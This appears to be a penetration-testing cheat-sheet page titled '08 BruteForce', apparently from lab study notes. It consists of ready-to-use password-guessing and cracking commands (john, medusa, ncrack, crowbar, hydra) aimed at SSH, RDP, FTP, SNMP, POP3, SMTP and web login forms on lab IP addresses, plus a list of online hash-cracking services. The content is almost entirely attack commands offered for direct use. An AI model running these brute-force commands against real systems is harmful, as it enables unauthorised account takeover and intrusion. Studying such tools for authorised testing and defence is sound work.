# 08 BruteForce

{% tabs %}
{% tab title="Offline" %}

```
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
medusa -h 10.11.1.111 -u username -P password-file.txt -M http -m DIR:/admin -T 10
ncrack -vv --user username -P password-file.txt rdp://10.11.1.111
ncrack –user username -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.10.149
crowbar -b rdp -s 10.11.1.111/32 -u username -C /root/words.txt -n 1
hydra -l username -P password-file.txt 10.11.1.111 ssh
hydra -P password-file.txt -v 10.11.1.111 snmp
hydra -l username -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V
hydra -l username -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V
hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V

# SIMPLE LOGIN GET
hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V

# GET FORM with HTTPS
hydra -l username -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"

# SIMPLE LOGIN POST
hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
```

{% endtab %}

{% tab title="Online URL" %}
<https://hashkiller.co.uk/Cracker>

<https://www.cmd5.org/>

<https://www.onlinehashcrack.com/>

<https://gpuhash.me/>

<https://crackstation.net/>

<https://crack.sh/>

<https://hash.help/>

<https://passwordrecovery.io/>

<http://cracker.offensive-security.com/>
{% endtab %}
{% endtabs %}